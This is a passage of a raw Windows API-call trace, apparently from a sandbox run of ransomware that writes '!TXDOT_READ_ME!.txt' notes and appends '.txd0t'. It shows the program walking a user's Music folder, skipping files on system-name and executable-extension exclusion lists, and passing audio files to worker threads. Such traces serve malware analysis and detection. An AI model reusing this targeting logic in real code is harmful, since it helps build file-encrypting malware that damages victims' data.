returned=".mp3" [0075.048] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0075.048] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0075.048] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0075.048] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.062] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.062] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\lwEeZe6NJKctwuGef3c.mp3" [0075.062] SetEvent (hEvent=0x3fc) returned 1 [0075.062] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc05ec6d0, ftCreationTime.dwHighDateTime=0x1d5e424, ftLastAccessTime.dwLowDateTime=0x3cacaa30, ftLastAccessTime.dwHighDateTime=0x1d5eef3, ftLastWriteTime.dwLowDateTime=0x3cacaa30, ftLastWriteTime.dwHighDateTime=0x1d5eef3, nFileSizeHigh=0x0, nFileSizeLow=0x18243, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="o_54eDamWws3.mp3", cAlternateFileName="O_54ED~1.MP3")) returned 1 [0075.062] StrCmpW (psz1="o_54eDamWws3.mp3", psz2=".") returned 1 [0075.063] StrCmpW (psz1="o_54eDamWws3.mp3", psz2="..") returned 1 [0075.063] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0075.063] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0075.063] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="o_54eDamWws3.mp3", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3" [0075.063] PathFindExtensionW (pszPath="o_54eDamWws3.mp3") returned=".mp3" [0075.063] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2="bootsect.bak") returned 1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2="iconcache.db") returned 1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2="thumbs.db") returned -1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2=" ransomware ") returned 1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2=" ransom ") returned 1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2="debug.txt") returned 1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2="boot.ini") returned 1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2="desktop.ini") returned 1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2="autorun.inf") returned 1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2="ntuser.dat") returned 1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2="ntldr") returned 1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2="ntdetect.com") returned 1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2="bootfont.bin") returned 1 [0075.063] StrCmpIW (psz1="o_54eDamWws3.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.063] PathFindExtensionW (pszPath="o_54eDamWws3.mp3") returned=".mp3" [0075.063] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0075.063] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0075.063] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0075.064] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0075.070] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.070] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3" [0075.070] SetEvent (hEvent=0x410) returned 1 [0075.070] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70852950, ftCreationTime.dwHighDateTime=0x1d5ec0e, ftLastAccessTime.dwLowDateTime=0x6056c510, ftLastAccessTime.dwHighDateTime=0x1d5ef02, ftLastWriteTime.dwLowDateTime=0x6056c510, ftLastWriteTime.dwHighDateTime=0x1d5ef02, nFileSizeHigh=0x0, nFileSizeLow=0x4ae3, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="rWrYpfOfe9_Zr8omah.mp3", cAlternateFileName="RWRYPF~1.MP3")) returned 1 [0075.070] StrCmpW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2=".") returned 1 [0075.070] StrCmpW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2="..") returned 1 [0075.070] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0075.070] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0075.070] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="rWrYpfOfe9_Zr8omah.mp3", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3" [0075.071] PathFindExtensionW (pszPath="rWrYpfOfe9_Zr8omah.mp3") returned=".mp3" [0075.071] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0075.071] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2="bootsect.bak") returned 1 [0075.072] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2="iconcache.db") returned 1 [0075.072] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2="thumbs.db") returned -1 [0075.072] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2=" ransomware ") returned 1 [0075.072] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2=" ransom ") returned 1 [0075.072] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2="debug.txt") returned 1 [0075.072] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2="boot.ini") returned 1 [0075.072] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2="desktop.ini") returned 1 [0075.072] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2="autorun.inf") returned 1 [0075.072] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2="ntuser.dat") returned 1 [0075.072] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2="ntldr") returned 1 [0075.072] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2="ntdetect.com") returned 1 [0075.072] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2="bootfont.bin") returned 1 [0075.072] StrCmpIW (psz1="rWrYpfOfe9_Zr8omah.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.072] PathFindExtensionW (pszPath="rWrYpfOfe9_Zr8omah.mp3") returned=".mp3" [0075.072] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0075.072] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0075.072] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0075.072] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.081] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.081] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3" [0075.081] SetEvent (hEvent=0x3fc) returned 1 [0075.081] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd839f70, ftCreationTime.dwHighDateTime=0x1d5ee74, ftLastAccessTime.dwLowDateTime=0x2cadb720, ftLastAccessTime.dwHighDateTime=0x1d5f036, ftLastWriteTime.dwLowDateTime=0x2cadb720, ftLastWriteTime.dwHighDateTime=0x1d5f036, nFileSizeHigh=0x0, nFileSizeLow=0xccdd, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Wv1ct5mSPlb.wav", cAlternateFileName="WV1CT5~1.WAV")) returned 1 [0075.081] StrCmpW (psz1="Wv1ct5mSPlb.wav", psz2=".") returned 1 [0075.081] StrCmpW (psz1="Wv1ct5mSPlb.wav", psz2="..") returned 1 [0075.081] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0075.081] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0075.081] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="Wv1ct5mSPlb.wav", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav" [0075.081] PathFindExtensionW (pszPath="Wv1ct5mSPlb.wav") returned=".wav" [0075.081] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0075.081] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2="bootsect.bak") returned 1 [0075.081] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2="iconcache.db") returned 1 [0075.081] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2="thumbs.db") returned 1 [0075.081] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2=" ransomware ") returned 1 [0075.081] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2=" ransom ") returned 1 [0075.081] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2="debug.txt") returned 1 [0075.081] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2="boot.ini") returned 1 [0075.081] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2="desktop.ini") returned 1 [0075.081] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2="autorun.inf") returned 1 [0075.081] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2="ntuser.dat") returned 1 [0075.081] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2="ntldr") returned 1 [0075.082] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2="ntdetect.com") returned 1 [0075.082] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2="bootfont.bin") returned 1 [0075.082] StrCmpIW (psz1="Wv1ct5mSPlb.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.082] PathFindExtensionW (pszPath="Wv1ct5mSPlb.wav") returned=".wav" [0075.082] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0075.082] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0075.082] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0075.082] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0075.088] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.088] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav" [0075.088] SetEvent (hEvent=0x410) returned 1 [0075.088] FindNextFileW (in: hFindFile=0xec27f0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd839f70, ftCreationTime.dwHighDateTime=0x1d5ee74, ftLastAccessTime.dwLowDateTime=0x2cadb720, ftLastAccessTime.dwHighDateTime=0x1d5f036, ftLastWriteTime.dwLowDateTime=0x2cadb720, ftLastWriteTime.dwHighDateTime=0x1d5f036, nFileSizeHigh=0x0, nFileSizeLow=0xccdd, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Wv1ct5mSPlb.wav", cAlternateFileName="WV1CT5~1.WAV")) returned 0 [0075.089] FindClose (in: hFindFile=0xec27f0 | out: hFindFile=0xec27f0) returned 1 [0075.089] GetProcessHeap () returned 0xe30000 [0075.089] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed36d0 | out: hHeap=0xe30000) returned 1 [0075.089] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4468cd60, ftCreationTime.dwHighDateTime=0x1d5efd1, ftLastAccessTime.dwLowDateTime=0x5d990a0, ftLastAccessTime.dwHighDateTime=0x1d5e39e, ftLastWriteTime.dwLowDateTime=0x5d990a0, ftLastWriteTime.dwHighDateTime=0x1d5e39e, nFileSizeHigh=0x0, nFileSizeLow=0x11f5, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="W-oOtVbhE3qMz.wav", cAlternateFileName="W-OOTV~1.WAV")) returned 1 [0075.089] StrCmpW (psz1="W-oOtVbhE3qMz.wav", psz2=".") returned 1 [0075.089] StrCmpW (psz1="W-oOtVbhE3qMz.wav", psz2="..") returned 1 [0075.089] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0075.089] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0075.089] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="W-oOtVbhE3qMz.wav", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav" [0075.089] PathFindExtensionW (pszPath="W-oOtVbhE3qMz.wav") returned=".wav" [0075.089] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2="bootsect.bak") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2="iconcache.db") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2="thumbs.db") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2=" ransomware ") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2=" ransom ") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2="debug.txt") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2="boot.ini") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2="desktop.ini") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2="autorun.inf") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2="ntuser.dat") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2="ntldr") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2="ntdetect.com") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2="bootfont.bin") returned 1 [0075.089] StrCmpIW (psz1="W-oOtVbhE3qMz.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.089] PathFindExtensionW (pszPath="W-oOtVbhE3qMz.wav") returned=".wav" [0075.089] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0075.089] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0075.089] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0075.090] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.097] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.097] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav" [0075.097] SetEvent (hEvent=0x3fc) returned 1 [0075.097] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e3e230, ftCreationTime.dwHighDateTime=0x1d5e756, ftLastAccessTime.dwLowDateTime=0xb0dfbc60, ftLastAccessTime.dwHighDateTime=0x1d5ee1e, ftLastWriteTime.dwLowDateTime=0xb0dfbc60, ftLastWriteTime.dwHighDateTime=0x1d5ee1e, nFileSizeHigh=0x0, nFileSizeLow=0x4934, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="WDCK.m4a", cAlternateFileName="")) returned 1 [0075.097] StrCmpW (psz1="WDCK.m4a", psz2=".") returned 1 [0075.097] StrCmpW (psz1="WDCK.m4a", psz2="..") returned 1 [0075.097] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0075.097] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0075.097] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="WDCK.m4a", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a" [0075.097] PathFindExtensionW (pszPath="WDCK.m4a") returned=".m4a" [0075.097] StrCmpW (psz1=".m4a", psz2=".txd0t") returned -1 [0075.097] StrCmpIW (psz1="WDCK.m4a", psz2="bootsect.bak") returned 1 [0075.097] StrCmpIW (psz1="WDCK.m4a", psz2="iconcache.db") returned 1 [0075.097] StrCmpIW (psz1="WDCK.m4a", psz2="thumbs.db") returned 1 [0075.097] StrCmpIW (psz1="WDCK.m4a", psz2=" ransomware ") returned 1 [0075.097] StrCmpIW (psz1="WDCK.m4a", psz2=" ransom ") returned 1 [0075.097] StrCmpIW (psz1="WDCK.m4a", psz2="debug.txt") returned 1 [0075.097] StrCmpIW (psz1="WDCK.m4a", psz2="boot.ini") returned 1 [0075.097] StrCmpIW (psz1="WDCK.m4a", psz2="desktop.ini") returned 1 [0075.097] StrCmpIW (psz1="WDCK.m4a", psz2="autorun.inf") returned 1 [0075.097] StrCmpIW (psz1="WDCK.m4a", psz2="ntuser.dat") returned 1 [0075.097] StrCmpIW (psz1="WDCK.m4a", psz2="ntldr") returned 1 [0075.097] StrCmpIW (psz1="WDCK.m4a", psz2="ntdetect.com") returned 1 [0075.098] StrCmpIW (psz1="WDCK.m4a", psz2="bootfont.bin") returned 1 [0075.098] StrCmpIW (psz1="WDCK.m4a", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.098] PathFindExtensionW (pszPath="WDCK.m4a") returned=".m4a" [0075.098] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".m4a") returned 0x0 [0075.098] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0075.098] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0075.098] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0075.104] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.104] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a" [0075.104] SetEvent (hEvent=0x410) returned 1 [0075.104] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e3e230, ftCreationTime.dwHighDateTime=0x1d5e756, ftLastAccessTime.dwLowDateTime=0xb0dfbc60, ftLastAccessTime.dwHighDateTime=0x1d5ee1e, ftLastWriteTime.dwLowDateTime=0xb0dfbc60, ftLastWriteTime.dwHighDateTime=0x1d5ee1e, nFileSizeHigh=0x0, nFileSizeLow=0x4934, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="WDCK.m4a", cAlternateFileName="")) returned 0 [0075.104] FindClose (in: hFindFile=0xec2670 | out: hFindFile=0xec2670) returned 1 [0075.105] GetProcessHeap () returned 0xe30000 [0075.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: 